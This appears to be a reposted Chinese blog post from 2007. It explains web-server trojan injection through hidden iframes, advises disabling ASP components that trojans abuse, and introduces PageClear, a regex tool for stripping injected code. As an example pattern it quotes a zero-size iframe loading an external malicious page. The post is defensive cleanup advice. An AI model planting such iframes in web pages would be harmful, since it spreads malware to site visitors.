原文:http://blog.orgact.com/leisang/archive/2007/11/09/00000002.html
现在很流行的一种侵入方式是首先入侵WEB服务器,注入木马,然后以服务器为媒介,面对网站用户大量散发病毒,这种方式一般通过向网页尾部加入<iframe></iframe>标记来隐藏自己并实现向用户的分发,如下图所示:
要防止此类注入,首先要确保服务器安全性,一般ASP木马是通过Shell.Application、WScript.Shell、FSO、WScript.Network组件来实现其功能的,因此这几个组件必须禁止,执行下面的语句,即可做到初步防范。
网站一旦被入侵,要清理是相当麻烦的,稍大点的网站动辄几百个页面,高级点的入侵甚至会采取一些随机代码来避开普通的替换工具。所以我写了一个清除工具PageClear,主要是清除网页木马,这是一个正则表达式替换器,因此也可以用作一些批量文本的匹配,替换工具。
使用说明:
1 选择要清理的目录,该工具可查找指定目录下(包括子目录)所有符合条件的文件。
2 指定匹配正则表达式,你可以直接复制木马代码,如“<iframe src=http://xxx.mmma.biz/ps.htm width=0 height=0></iframe>”。或使用正则来匹配各种样本。
3 替换表达式一般为空,也可以填写你想要替换的内容。
4 操作的文件类型:你要操作的文件扩展名,用|隔开,注意前面不要漏了"."符号。
5 测试文本:对你设定的正则表达式的测试。
建议指定正则表达式后将网页样本复制到测试文本框中进行测试,确认无误后点击“开始清理”,即可执行清理工作了。
本工具需要.net Framework 2.0支持,电脑装此框架的可以去微软网站下载:Microsoft .NET Framework 2.0 版可再发行组件包 (x86)
下载PageClear1.0 大小:36K